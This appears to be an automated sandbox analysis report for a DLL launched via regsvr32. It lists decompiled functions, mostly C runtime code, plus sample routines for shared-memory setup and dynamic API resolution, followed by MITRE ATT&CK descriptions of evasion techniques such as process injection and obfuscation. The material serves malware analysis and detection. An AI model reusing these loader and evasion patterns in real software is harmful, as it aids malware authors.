Opcode ID: 77a5e39aa690444f9ac9e59935713e3fb2cf7be290f81dc5801e62c4130dfdfd
Instruction ID: fea5180918018e8bba757f65245d90dd390fc297f7fecad8375ce4943f0c3de7
Opcode Fuzzy Hash: 77a5e39aa690444f9ac9e59935713e3fb2cf7be290f81dc5801e62c4130dfdfd
Instruction Fuzzy Hash: BF215335308211FEFB217F65F821A3ABBE5EF81759B10841DE48596160FB72B8109A65

Uniqueness

Uniqueness Score: -1.00%

Function 04D92A18, Relevance: 13.7, APIs: 9, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,04DA4288,00000001,?,00000100,?,?,?,?,?,04D92BFE,?,?,?,?,?), ref: 04D92A45
GetLastError.KERNEL32(?,04D92BFE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D92A57
_malloc.LIBCMT ref: 04D92AF1
_memset.LIBCMT ref: 04D92B11
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04D92B34
__freea.LIBCMT ref: 04D92B3E
___ansicp.LIBCMT ref: 04D92B68
___convertcp.LIBCMT ref: 04D92B89

Part of subcall function 04D9DAAB: _strlen.LIBCMT ref: 04D9DB2B
Part of subcall function 04D9DAAB: _memset.LIBCMT ref: 04D9DBA3
Part of subcall function 04D9DAAB: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,04D92BFE), ref: 04D9DBD5

GetStringTypeA.KERNEL32(?,?,?,?,?,00000100,?,?,?,?,?,04D92BFE,?,?,?,?), ref: 04D92BA9

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: StringType$_memset$ByteCharErrorLastMultiWide___ansicp___convertcp__freea_malloc_strlen
String ID:
API String ID: 3363058749-0
Opcode ID: 640fbfc7da42faefa93bcab8ede5cf0ada7fda71223f6190b8808ee1b2a233d9
Instruction ID: f6806e8b91f9fee806fbc30c8112b529ad5829635715f3f168755a96f5d2163f
Opcode Fuzzy Hash: 640fbfc7da42faefa93bcab8ede5cf0ada7fda71223f6190b8808ee1b2a233d9
Instruction Fuzzy Hash: 6851BC7260020ABFDF209F65DC85DAE3BE9FB08358B1049A9F918D7254D734ED60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D854A8, Relevance: 13.6, APIs: 9, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 04D854FB
__lock.LIBCMT ref: 04D85511
__copytlocinfo_nolock.LIBCMT ref: 04D85523
__setlocale_nolock.LIBCMT ref: 04D85538
__lock.LIBCMT ref: 04D8556D
___removelocaleref.LIBCMT ref: 04D85585
_sync_legacy_variables_lk.LIBCMT ref: 04D855BE

Part of subcall function 04D85B1F: __getptd_noexit.LIBCMT ref: 04D85B1F

Part of subcall function 04D85AA7: __decode_pointer.LIBCMT ref: 04D85AB0

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: __lock$___removelocaleref__calloc_crt__copytlocinfo_nolock__decode_pointer__getptd_noexit__setlocale_nolock_sync_legacy_variables_lk
String ID:
API String ID: 1358582686-0
Opcode ID: 3ff037472132351e5167a3da6c130c74f7e49a2fb5d79f1d9262cf324f94afbb
Instruction ID: b351c099f587786533f2ac5cf9d8f3cd29ea807c4c5e0c7c913c1d1b27865318
Opcode Fuzzy Hash: 3ff037472132351e5167a3da6c130c74f7e49a2fb5d79f1d9262cf324f94afbb
Instruction Fuzzy Hash: 9C31C171B00305BBFB10FFA4A8957BC37A1EF41328F10445EE4056B281DBB4BA419B75

Uniqueness

Uniqueness Score: -1.00%

Function 04D71979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04D71979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L04D72210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x4d741d0;
				_push(_t15 + 0x4d7505e);
				_push(_t15 + 0x4d75054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L04D7220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x4d741c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x04d71979
0x04d71982
0x04d71986
0x04d7198c
0x04d71991
0x04d71996
0x04d71999
0x04d7199c
0x04d719a1
0x04d719a2
0x04d719a5
0x04d719b0
0x04d719b7
0x04d719bb
0x04d719bd
0x04d719be
0x04d719c1
0x04d719c6
0x04d719d0
0x04d719d2
0x04d719d2
0x04d719ec
0x04d719f0
0x04d71a40
0x04d719f2
0x04d719fb
0x04d71a11
0x04d71a19
0x04d71a2b
0x04d71a2f
0x00000000
0x00000000
0x04d71a1b
0x04d71a1e
0x04d71a23
0x04d71a25
0x04d71a25
0x04d71a06
0x04d71a08
0x04d71a31
0x04d71a32
0x04d71a32
0x04d719fb
0x04d71a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?,?), ref: 04D71986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04D7199C
_snwprintf.NTDLL ref: 04D719C1
CreateFileMappingW.KERNEL32(000000FF,04D741C0,00000004,00000000,?,?), ref: 04D719E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?), ref: 04D719FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04D71A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?), ref: 04D71A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A), ref: 04D71A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?), ref: 04D71A3A

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 0d4c5c68f111274b9d2246ed23c7e7bccf9308765e3f9a68664a40a869dcd7a0
Instruction ID: dcf7462311c7739f9fddaba68eebdc220753c2c7cf7e71003f1649bb9257fc87
Opcode Fuzzy Hash: 0d4c5c68f111274b9d2246ed23c7e7bccf9308765e3f9a68664a40a869dcd7a0
Instruction Fuzzy Hash: 5C21CFB2600218FFCB11AFA8EC85E9E37A8FB48354F108225FA01D7240F634AD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04D8650A, Relevance: 10.8, APIs: 7, Instructions: 262COMMON

Download Yara Rule

APIs

__isleadbyte_l.LIBCMT ref: 04D8629C
__aulldvrm.LIBCMT ref: 04D86601
_write_multi_char.LIBCMT ref: 04D866CE
_write_string.LIBCMT ref: 04D866E2
_write_multi_char.LIBCMT ref: 04D866FB
_write_multi_char.LIBCMT ref: 04D86779

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: _write_multi_char$__aulldvrm__isleadbyte_l_write_string
String ID:
API String ID: 2598234172-0
Opcode ID: b90484804f9a5c663edbee6205ac996f6f9941897c9f028d9c6d2cf9e7ffd023
Instruction ID: 253ade471d41b7a30cf57480690d0979d09d1416bb036171240977ac903cfd00
Opcode Fuzzy Hash: b90484804f9a5c663edbee6205ac996f6f9941897c9f028d9c6d2cf9e7ffd023
Instruction Fuzzy Hash: 50A17E71D0024A9AEF21EFA8D9487FDBBB4FF04328F24419DD95176294E774EA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D71AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D71AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E04D71C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x4d741d0 + 0x4d75014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d750e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E04D7136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d750f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d75104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d75119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d7512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E04D718D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x04d71ab3
0x04d71ab7
0x04d71b78
0x04d71abd
0x04d71ad5
0x04d71ae4
0x04d71aeb
0x04d71aef
0x04d71af2
0x04d71b70
0x04d71b71
0x04d71af4
0x04d71b01
0x04d71b05
0x04d71b08
0x00000000
0x04d71b0a
0x04d71b17
0x04d71b1b
0x04d71b1e
0x00000000
0x04d71b20
0x04d71b2d
0x04d71b31
0x04d71b34
0x00000000
0x04d71b36
0x04d71b43
0x04d71b47
0x04d71b4a
0x00000000
0x04d71b4c
0x04d71b52
0x04d71b58
0x04d71b5d
0x04d71b64
0x04d71b67
0x00000000
0x04d71b69
0x04d71b6c
0x04d71b6c
0x04d71b67
0x04d71b4a
0x04d71b34
0x04d71b1e
0x04d71b08
0x04d71af2
0x04d71b86

APIs

Part of subcall function 04D71C8F: HeapAlloc.KERNEL32(00000000,?,04D7117D,?,00000000,00000000,?,?,?,04D71810), ref: 04D71C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,04D71272,?,?,?,?,00000002,00000000,?,?), ref: 04D71AC9
GetProcAddress.KERNEL32(00000000,?), ref: 04D71AEB
GetProcAddress.KERNEL32(00000000,?), ref: 04D71B01
GetProcAddress.KERNEL32(00000000,?), ref: 04D71B17
GetProcAddress.KERNEL32(00000000,?), ref: 04D71B2D
GetProcAddress.KERNEL32(00000000,?), ref: 04D71B43

Part of subcall function 04D718D1: memset.NTDLL ref: 04D71950

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: e912fd4f817e7681afb864a0a46023b266c165d40ebf7779d53642976a56125c
Instruction ID: 6d9f6f4a1e963998b8b86c82665d471d0f8b86044bb73bdc1a14e6aa8a29e598
Opcode Fuzzy Hash: e912fd4f817e7681afb864a0a46023b266c165d40ebf7779d53642976a56125c
Instruction Fuzzy Hash: 61210EB1A0021AEFD710EF69D894E5A77ECFB05684B058626ED49C7711F734ED018FA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D8A679, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

MOC, xrefs: 04D8A69F
csm, xrefs: 04D8A6B3
csm, xrefs: 04D8A76B

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID: MOC$csm$csm
API String ID: 0-2232927589
Opcode ID: 9a751069da1ca90159670499d863a10cd5c3665d7a054ee3be1b5662053c20d1
Instruction ID: 887d8397c2d7b8d8705188ad9d6dae3eb04a8ab31bca2c26aa9000a4ed37a7e9
Opcode Fuzzy Hash: 9a751069da1ca90159670499d863a10cd5c3665d7a054ee3be1b5662053c20d1
Instruction Fuzzy Hash: DC315A71A006059FEB30BE68CC847B973F8BF45209F69486FD89586311E734F585AB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D84237, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 04D84255

Part of subcall function 04D883C2: __mtinitlocknum.LIBCMT ref: 04D883D6
Part of subcall function 04D883C2: __amsg_exit.LIBCMT ref: 04D883E2
Part of subcall function 04D883C2: RtlEnterCriticalSection.NTDLL(?), ref: 04D883EA

___sbh_find_block.LIBCMT ref: 04D84260
___sbh_free_block.LIBCMT ref: 04D8426F
HeapFree.KERNEL32(00000000,00000001,04DE0D30,0000000C,04D883A3,00000000,04DE0DE8,0000000C,04D883DB,00000001,?,?,04D96C04,00000004,04DE12B8,0000000C), ref: 04D8429F
GetLastError.KERNEL32(?,04D96C04,00000004,04DE12B8,0000000C,04D8B5B4,00000000,00000000,00000000,00000000,00000000,04D8AFC8,00000001,00000214), ref: 04D842B0

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: fc999ebfe209afbfb1e05fd35c634b2d1ee96f41a0540c882ceaaa35344ac9bc
Instruction ID: 28a22e1c56cc9a6f3e7c288979438ff48abc4764ebb6bd87cdac0a12babe673b
Opcode Fuzzy Hash: fc999ebfe209afbfb1e05fd35c634b2d1ee96f41a0540c882ceaaa35344ac9bc
Instruction Fuzzy Hash: FF016231A05316EEEF207FB1A814B7E3BA4EF00765F21411DF454AA080EA78B540EA64

Uniqueness

Uniqueness Score: -1.00%

Function 04D820C0, Relevance: 6.2, APIs: 4, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 04D820E7

Part of subcall function 04D82E20: __EH_prolog3.LIBCMT ref: 04D82E27
Part of subcall function 04D82E20: std::_Lockit::_Lockit.LIBCPMT ref: 04D82E3B
Part of subcall function 04D82E20: std::locale::_Setgloballocale.LIBCPMT ref: 04D82E74

std::_Lockit::_Lockit.LIBCPMT ref: 04D820FD
GetWindowsDirectoryA.KERNEL32 ref: 04D8212B
std::_Lockit::_Lockit.LIBCPMT ref: 04D82308

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: LockitLockit::_std::_$std::locale::_$DirectoryH_prolog3InitSetgloballocaleWindows
String ID:
API String ID: 2221243735-0
Opcode ID: e14c0908c61d0a7eb7c74444ad00e67ffb7771af0552f91de2edab4bf32ce364
Instruction ID: 30c8461d659da8fa1a5d21cc99b44c066374e6615d741dec7b12b80885f0e3ce
Opcode Fuzzy Hash: e14c0908c61d0a7eb7c74444ad00e67ffb7771af0552f91de2edab4bf32ce364
Instruction Fuzzy Hash: 7D71A571A042108BC714EF3AE86176577E9FB84714F0546ADE45A9B3C5D738B908CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D92996, Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,04DA4288,00000001,?,00000100,?,?,?,?,?,04D92BFE,?,?,?,?,?), ref: 04D92A45
GetLastError.KERNEL32(?,04D92BFE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D92A57
_malloc.LIBCMT ref: 04D92AF1
_memset.LIBCMT ref: 04D92B11
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04D92B34
__freea.LIBCMT ref: 04D92B3E
___ansicp.LIBCMT ref: 04D92B68

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: StringType$ErrorLast___ansicp__freea_malloc_memset
String ID:
API String ID: 1764942736-0
Opcode ID: e7f2afed4f9b08f265225db05fc2639b47e90b330ad868cb0462c0f9c26d33e6
Instruction ID: 54928c1b85fcc8f75eda4531a4cee4dc5a5bb3fa5d90a72598c0e24217074eab
Opcode Fuzzy Hash: e7f2afed4f9b08f265225db05fc2639b47e90b330ad868cb0462c0f9c26d33e6
Instruction Fuzzy Hash: 7741E6B3A00105BFEF119FA4DCC59EA7FE8FB15359B110868E955C6100D774AE67CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04D8F05E, Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04D8B016: __getptd_noexit.LIBCMT ref: 04D8B017
Part of subcall function 04D8B016: __amsg_exit.LIBCMT ref: 04D8B024

__amsg_exit.LIBCMT ref: 04D8F08A
__lock.LIBCMT ref: 04D8F09A
InterlockedDecrement.KERNEL32(?), ref: 04D8F0B7
InterlockedIncrement.KERNEL32(04DE4F18), ref: 04D8F0E2

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 43168c61f33e76f1de3953f7af7f8b4d85b5968d5701b40b6f9d71969f73b890
Instruction ID: 8489eee48f855f5a6b41bbf49535afba6e55f45d75b872f44481781008e449b9
Opcode Fuzzy Hash: 43168c61f33e76f1de3953f7af7f8b4d85b5968d5701b40b6f9d71969f73b890
Instruction Fuzzy Hash: FA016D31F04711AFEB21BB65941477DB7A0FB00B24F11414DE914AB380D778B941EBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04D834E4, Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 04D834EC

Part of subcall function 04D89B05: __NMSG_WRITE.LIBCMT ref: 04D89B2C
Part of subcall function 04D89B05: __NMSG_WRITE.LIBCMT ref: 04D89B36

__NMSG_WRITE.LIBCMT ref: 04D834F3

Part of subcall function 04D89945: _strcpy_s.LIBCMT ref: 04D899B1
Part of subcall function 04D89945: __invoke_watson.LIBCMT ref: 04D899C2
Part of subcall function 04D89945: GetModuleFileNameA.KERNEL32(00000000,04EEA0E1,00000104,04D8AFC8,00000001,00000214), ref: 04D899DE
Part of subcall function 04D89945: _strcpy_s.LIBCMT ref: 04D899F3
Part of subcall function 04D89945: __invoke_watson.LIBCMT ref: 04D89A06
Part of subcall function 04D89945: _strlen.LIBCMT ref: 04D89A0F
Part of subcall function 04D89945: _strlen.LIBCMT ref: 04D89A1C
Part of subcall function 04D89945: __invoke_watson.LIBCMT ref: 04D89A49

Part of subcall function 04D89565: ___crtCorExitProcess.LIBCMT ref: 04D89569
Part of subcall function 04D89565: ExitProcess.KERNEL32 ref: 04D89573

RtlAllocateHeap.NTDLL(00000000,?), ref: 04D83520
RtlAllocateHeap.NTDLL(00000000,?), ref: 04D83550

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: __invoke_watson$AllocateExitHeapProcess_strcpy_s_strlen$FileModuleName___crt
String ID:
API String ID: 4108966708-0
Opcode ID: 3141e10d5ebebd7dca04cf45d2811646957db142d5c2659d7fcd7cb43e3bc251
Instruction ID: 81dfe20b80e5c03c501ace676479ad5e63e0aaf0bf0ab52bde816b2923651d85
Opcode Fuzzy Hash: 3141e10d5ebebd7dca04cf45d2811646957db142d5c2659d7fcd7cb43e3bc251
Instruction Fuzzy Hash: E1F0F6326042116AFB11BA25BC58B7E2B58FF05F24F2100ACFC5CE91C1D761FC8095A5

Uniqueness

Uniqueness Score: -1.00%

Function 04D8494A, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 04D8B016: __getptd_noexit.LIBCMT ref: 04D8B017
Part of subcall function 04D8B016: __amsg_exit.LIBCMT ref: 04D8B024

__calloc_crt.LIBCMT ref: 04D8495F

Part of subcall function 04D8B5A1: __calloc_impl.LIBCMT ref: 04D8B5AF
Part of subcall function 04D8B5A1: Sleep.KERNEL32(00000000,04D8AFC8,00000001,00000214), ref: 04D8B5C6

__lock.LIBCMT ref: 04D84995
___addlocaleref.LIBCMT ref: 04D849A1
InterlockedIncrement.KERNEL32(?), ref: 04D849B6

Part of subcall function 04D85B1F: __getptd_noexit.LIBCMT ref: 04D85B1F

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: __getptd_noexit$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__lock
String ID:
API String ID: 1017034129-0
Opcode ID: 7004d15abbc3c7589b16d438f287f64a25787b065f70fa12d57d01e5b4ceb959
Instruction ID: e18ce885fa334c154027e14b80d85cbbb4cf4f95b24f99934cda84ef25a7505f
Opcode Fuzzy Hash: 7004d15abbc3c7589b16d438f287f64a25787b065f70fa12d57d01e5b4ceb959
Instruction Fuzzy Hash: 17F01931740216EAFB21BFB4984173877A0EF45754F10814DE49596280EBB5B9409B75

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

